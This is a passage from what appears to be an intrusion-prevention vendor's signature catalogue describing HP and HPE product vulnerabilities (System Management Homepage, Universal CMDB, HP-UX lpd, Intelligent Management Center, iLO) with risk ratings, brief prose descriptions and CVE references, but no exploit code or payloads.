Description: A code execution vulnerability exists in HP System Management Homepage (SMH). The vulnerability is due to a flaw when handling the iprange parameter sent to the /proxy/DataValidation URL. A remote attacker can exploit this vulnerability by sending a malicious request to the affected server. A successful exploitation attempt could result in executing arbitrary code on the target server. Anonymous access must be enabled to trigger this vulnerability.
Situation: HTTP_CSU-HP-System-Management-Homepage-Iprange-Parameter-Code-Execution
References:
OSVDB-91812
http://www.osvdb.org/91812
Back to top

HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP System Management Homepage (SMH)
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: HP System Management Homepage
Type: Buffer Overflow
Description: A stack buffer overflow exists in HP System Management Homepage. The vulnerability is due to insufficient input validation when handling HTTP requests containing an iprange variable to the /proxy/DataValidation URI. The application copies the variable into a fixed size stack buffer, which could overflow. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in arbitrary code execution in the context of the currently affected service, which is System by default.
Situation: HTTP_CRL-HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow
References:
CVE-2013-2362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2362
OSVDB-95489
http://www.osvdb.org/95489
Back to top

HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting

About this vulnerability: A vulnerability in HP System Management Homepage (SMH)
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: HP System Management Homepage
Type: Input Validation
Description: A cross-site scripting vulnerability exists in HP's System Management Homepage (SMH). The vulnerability is due to an input validation error when handling 'RedirectUrl' parameter of red2301.html page. A remote attacker could exploit this vulnerability by enticing a target user to follow a malicious link. Successful exploitation of this vulnerability would result in execution of attacker-controlled script code in the browser of the target user in the security index of the vulnerable server.
Situation: HTTP_CRL-HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting
References:
CVE-2014-2640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2640
OSVDB-112410
http://www.osvdb.org/112410
Back to top

HP-Universal-CMDB-Default-Credentials-Arbitrary-File-Upload

About this vulnerability: A vulnerability in HP Universal CMDB
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: HP Universal CMDB Server
Type: Malfunction
Description: A code execution vulnerability exists in HP Universal CMDB. The vulnerability is due to the use of hard-coded credentials when processing HTTP requests. A remote attacker can upload arbitrary files to arbitrary locations using the default credentials. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-Apache-Axis2-Default-Credentials
References:
CVE-2014-2617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2617
BID-68363
http://www.securityfocus.com/bid/68363
OSVDB-108717
http://www.osvdb.org/108717
Back to top

HP-Universal-CMDB-Server-Axis2-Default-Credentials

About this vulnerability: A vulnerability in HP Universal CMDB Server
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: HP Universal CMDB Server
Type: Malfunction
Description: There is a vulnerability in HP Universal CMDB Server. The vulnerability is due to an authentication weakness in the product's configuration. When the software is installed, default credentials are assigned to the Axis2 web services component. A remote attacker can leverage this vulnerability to upload a malicious web service to a target system, enabling arbitrary code execution within the security context of an Axis2 web service.
Situation: HTTP_CRL-Apache-Axis2-Default-Credentials
References:
CVE-2010-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0219
OSVDB-70233
http://www.osvdb.org/70233
Back to top

HP-UX-LPD-Buffer-Overflow

About this vulnerability: An HP-UX LPD Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: lpd
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the lp subsystem for HP-UX, 10.20 through 11.11, which allows remote attackers to cause a denial of service condition or possible execute arbitrary code.
Situation: Printer_HP-UX-LPD-Buffer-Overflow
References:
CVE-2002-1473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1473
OSVDB-9638
http://www.osvdb.org/9638
Back to top

HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability

About this vulnerability: A vulnerability in HP-UX Remote Line Printer Daemon
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: HP-UX
Software: lpd
Type: Malfunction
Description: A vulnerability in HP-UX line printer daemon (rlpdaemon) in HP-UX 10.01 through 11.11 allows remote attackers to modify arbitrary files and gain root privileges via a certain print request.
Situation: Printer_CS-HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability
References:
CVE-2001-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0817
BID-3561
http://www.securityfocus.com/bid/3561
Back to top

HP-VAN-SDN-Controller-Command-Injection

About this vulnerability: A vulnerability in HP VAN SDN Controller
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux;Unix
Software: HP VAN SDN Controller
Type: Code Injection
Description: A vulnerability in HP VAN SDN Controller, versions <= 2.7.18.0503, which allows remote attackers to execute arbitrary code due to insufficient sanitization of the name parameter in the uninstall action.
Situation: File-Text_HP-VAN-SDN-Controller-Command-Injection
Back to top

HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities

About this vulnerability: HP Virtual Rooms Install Multiple Remote Buffer Overflow Vulnerabilities
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP Virtual Rooms
Type: Malfunction
Description: A vulnerability exists in HP Virtual Rooms.
Situation: File-Text_HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities
Back to top

HP-Web-Jetadmin

About this vulnerability: A vulnerability in HP Web JetAdmin
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: HP Web JetAdmin
Type: Input Validation
Description: There are multiple vulnerabilities within HP Web JetAdmin, a web based software program developed by Hewlett Packard. It is possible, through the use of multiple vulnerabilities, for the attacker to execute arbitrary code on the remote server running HP Web JetAdmin in a ROOT level context. Issue 1: There is no difference in the behaviour of a server running a vulnerable version of HP Web JetAdmin when encountering the uploading of a real firmware update versus any other type of file (i.e. "hts file, executable"). Issue 2: The target will include the specified file in the HTTP reply content. The file data begins right after the HTTP header and ends two line-feeds (a 0x0A character) before the &lt;html&gt; tag. Issue 3: The behaviour of the attack target depends entirely on the input injected by the attacker into the malicious request.
Situation: HTTP_CRL-HP-Web-Jetadmin
References:
CVE-2004-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1856
BID-9971
http://www.securityfocus.com/bid/9971
Back to top

HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow

About this vulnerability: A vulnerability in HPE Data Protector
Risk: Moderate
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: An improper boundary check in HPE Data Protector results in a buffer overflow vulnerability. A successful exploitation allows an attacker to run arbitrary code with SYSTEM privileges.
Situation: Generic_CS-HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow
References:
CVE-2016-2005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2005
Back to top

HPE-IMC-Accessmgrservlet-Classname-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure deserialization of untrusted data causes a vulnerability in HPE Intelligent Management Center. A successful exploit may allow a remote attacker to execute code on the target with system privileges.
Situation: File-Binary_HPE-Intelligent-Management-Center-Accessmgrservlet-Classname-Insecure-Deserialization
References:
CVE-2019-11945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11945
Back to top

HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of untrusted data in URL parameters causes a vulnerability in HPE Intelligent Management Center. A successful exploit may allow a remote attacker to execute code on the target with system privileges.
Situation: HTTP_CRL-HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection
References:
CVE-2019-5373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5373
Back to top

HPE-IMC-Deployselectbootrom-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-HPE-IMC-Deployselectbootrom-Expression-Language-Injection
Back to top

HPE-IMC-Devgroupselect-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-HPE-IMC-Devgroupselect-Expression-Language-Injection
Back to top

HPE-IMC-Forwardredirect-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of payload in HTTP requests causes an expression language injection vulnerability in HP Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code with system privileges.
Situation: HTTP_CRL-HPE-IMC-Forwardredirect-Expression-Language-Injection
Back to top

HPE-IMC-Iccselectdevtypebean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insufficient validation of the beanName request parameter by the IccSelectDevTypeBean class causes an expression language vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code with system privileges.
Situation: HTTP_CSU-HPE-Intelligent-Management-Center-Iccselectdevtypebean-Expression-Language-Injection
References:
CVE-2019-11941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11941
Back to top

HPE-IMC-Ictexpertdownload-Expression-Language-Injection

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-974-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Input Validation
Description: Bad handling of the beanName parameter in a HTTP request causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code withouth authentication on the target system with system-level privileges.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Ictexpertdownload-Expression-Language-Injection
References:
CVE-2017-12500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12500
Back to top

HPE-IMC-Icttableexporttocsvbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of the beanName request parameter by the IctTableExportToCSVBean class causes an expression language vulnerability in HPE Intelligen Management Center. A successful exploit allows an attacker to run arbitrary code with system privileges.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Icttableexporttocsvbean-Expression-Language-Injection
References:
CVE-2019-5370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5370
Back to top

HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of the beanName request parameter by the OperatorGroupTreeSelectBean class causes an expression language injection vulnerability in HPE IMC. A successful exploit may allow an attacker to run arbitrary code on the target with system privileges.
Situation: HTTP_CRL-HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection
References:
CVE-2019-5374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5374
Back to top

HPE-IMC-Plat-Redirectservlet-Parafile-Directory-Traversal

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Directory Traversal
Description: Improper input validation causes a directory traversal vulnerability in HPE iMC PLAT. A successful exploitation can allow an attacker to cause a denial of service condition on the target.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Plat-Redirectservlet-Parafile-Directory-Traversal
References:
CVE-2016-8530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8530
Back to top

HPE-IMC-Saveselecteddevices-Expression-Language-Injection

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Input Validation
Description: Insufficient validation of RPC requests causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Text_HPE-Intelligent-Management-Center-Saveselecteddevices-Expression-Language-Injection
References:
CVE-2017-12491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12491
Back to top

HPE-IMC-Sshconfig-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-HPE-IMC-Sshconfig-Expression-Language-Injection
Back to top

HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure deserialization of untrusted data causes a vulnerability in HPE Intelligent Management Center. A successful exploit may allow a remote attacker to execute code on the target with system privileges.
Situation: File-Binary_HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection
References:
CVE-2019-11942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11942
Back to top

HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: An Expression Language injection vulnerability has been reported in HPE Intelligent Management Center. This vulnerability is due to insufficient handling of the beanName request parameter by the TvxlanLegendBean class. A remote attacker could exploit these vulnerabilities by sending a crafted request to the target service. Successful exploitation results in the execution of arbitrary code under the security context of the SYSTEM user.
Situation: HTTP_CRL-HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection
Back to top

HPE-IMC-Userselectpagingcontent-Expression-Language-Injection

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Input Validation
Description: Insufficient handling of the beanName request parameter on userSelectPagingContent causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code on the target system with system privileges.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Userselectpagingcontent-Expression-Language-Injection
References:
CVE-2017-12521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12521
Back to top

HPE-IMC-Webdmdebugservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure serialization of untrusted data causes a vulnerability in HP Intelligent Management Center. A successful exploit can allow an attacker to run arbitrary code on the target system with system privileges.
Situation: HTTP_CRL-HPE-IMC-Center-Webdmdebugservlet-Insecure-Deserialization
References:
CVE-2017-12557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12557
Back to top

HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal

About this vulnerability: A vulnerability in HPE Insight Remote Support
Risk: Moderate
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: HPE Insight Remote Support
Type: Directory Traversal
Description: The lack of proper validation of a user-supplied path in processAtatchmentDataStream function causes a directory traversal vulnerability in HPE Insight Remote Support. A successful exploitation may allow an attacker to execute code on the target system.
Situation: File-TextId_HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal
References:
CVE-2024-53676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53676
Back to top

HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection

About this vulnerability: A vulnerability in HPE Insight Remote Support
Risk: Moderate
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1849-5242
Platform: Generic
Software: HPE Insight Remote Support
Type: Input Validation
Description: The lack of proper validation of a user-supplied XML data in setInputStream function causes an external entity injection vulnerability in HPE Insight Remote Support. A successful exploitation allows an attacker to make the target download and parse arbitrary XML documents and possibly disclose sensitive information.
Situation: File-Text_HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection-CVE-2024-11622
References:
CVE-2024-11622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11622
Back to top

HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675

About this vulnerability: A vulnerability in HPE Insight Remote Support
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: HPE Insight Remote Support
Type: Input Validation
Description: An XXE vulnerability has been reported in HPE Insight Remote Support. The vulnerability is due to the lack of proper validation of a user-supplied XML data in validateAgainstXSD function. Successful exploitation results in information disclosure.
Situation: File-TextId_HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675
References:
CVE-2024-53675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53675
Back to top

HPE-Integrated-Lights-Out-CVE-2017-12542

About this vulnerability: A vulnerability in HPE iLO
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: HPE iLO
Type: Buffer Overflow
Description: There exists an authentication bypass and remote code execution vulnerability in HPE Integrated Lights Out 4 (iLO 4) due to improper handling of overlong Connection headers.
Situation: HTTP_CSH-HPE-Integrated-Lights-Out-CVE-2017-12542
References:
CVE-2017-12542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12542
Back to top

HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insecure deserialization of user-supplied data causes a vulnerability in HPE Intelligent Management Center. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization
References:
CVE-2017-5790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5790
Back to top

HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in HPE Intelligent Management Center. This vulnerability could be exploited by an unauthenticated, remote attacker. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization
References:
CVE-2019-11944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11944
Back to top

HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There exists an insecure deserialization vulnerability in HPE Intelligent Management Center. This vulnerability could be exploited remotely by an authenticated attacker. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization
References:
CVE-2019-11956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11956
Back to top

HPE-Intelligent-Management-Center-Dbman-Backupzipfile-Command-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There exists a command injection vulnerability in HPE Intelligent Management Center. A remote attacker can use this to execute arbitrary commands on the affected system.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection
References:
CVE-2017-5820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5820
Back to top

HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HPE Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability in the dbman component of HP Intelligent Management Center, versions prior to 7.3 E0605P06, which allows remote attcakers to execute arbitrary code, due to the lack of proper validation of the length of user supplied data.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow
References:
CVE-2018-7114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7114
Back to top

HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write

About this vulnerability: An HPE Intelligent Management Center Dbman FileTrans Arbitrary File Write vulnerability
Risk: Moderate
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: An arbitrary file write vulnerability in HP Intelligent Management Center, versions prior to 7.3 E0504P04, in the dbman component, which allows remote attackers to write arbitrary files and possibly execute remote code by sending a crafted packet to the target server.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write
References:
CVE-2017-5822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5822
Back to top

HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Malfunction
Description: A vulnerability in HP Intelligent Management Center, versions 7.3 E0506P09 and prior, which allows remote attackers to cause a denial of service condition on the target server by sending a maliciously crafted packet, due to an unhandled exception in the fileName field using opcode 10003.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS
References:
CVE-2019-5355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5355
Back to top

HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS

About this vulnerability: A vulnerability in HPE Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Insecure Configuration
Description: A vulnerability in HPE Intelligent Management Center, versions 7.3 E0506P09 and before, which allows a remote attacker to cause a denial of service condition by sending a crafted packet using opcode 10014, due to an undocumented "kill" command.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS
References:
CVE-2018-7123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7123
Back to top

HPE-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper validation of user-supplied request data causes a command injection vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary commands with system privileges.
Situation: Generic_CS-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection
References:
CVE-2017-5816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5816
Back to top

HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Improper validation of user-supplied parameters causes an SQL command injection vulnerability in HP Intelligent Management Center. A successful attack allows arbitrary commands to be executed on the target system.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection
References:
CVE-2017-5817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5817
Back to top

HPE-Intelligent-Management-Center-Dbman-Restorezipfile-Command-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: There exists a command injection vulnerability in HPE Intelligent Management Center. A remote attacker can use this to execute arbitrary commands on the affected system.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection
References:
CVE-2017-5821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5821
Back to top

HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: Improper validation of user-sent commands causes a stack buffer overflow in HPE Intelligent Management Center. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow
References:
CVE-2017-8956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8956
Back to top

HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow in the dbman component of HPE Intelligent Management Center. This vulnerability can be exploited by a remote, unautheticated attacker. Successful exploitation could result in arbitrary code execution.
Situation: Generic_CS-HPE-Intelligent-Management-Center-Dbman-Stack-Buffer-Overflow-CVE-2018-7115
References:
CVE-2018-7115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7115
Back to top

HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection

About this vulnerability: A vulnerability in HPE iMC PLAT
Risk: Moderate
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HPE iMC PLAT
Type: Input Validation
Description: Improper validation of HTTP requests causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code with system-level privileges without authentication.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection
References:
CVE-2017-12490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12490
Back to top

HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: Insufficient handling of the beanName request parameter in iccSelectCommand.xhtml causes an expression language injection vulnerability in HPE IMC. A successful exploit may allow an attacker to run arbitrary code on the target with system privileges.
Situation: HTTP_CRL-HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection
Back to top

HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
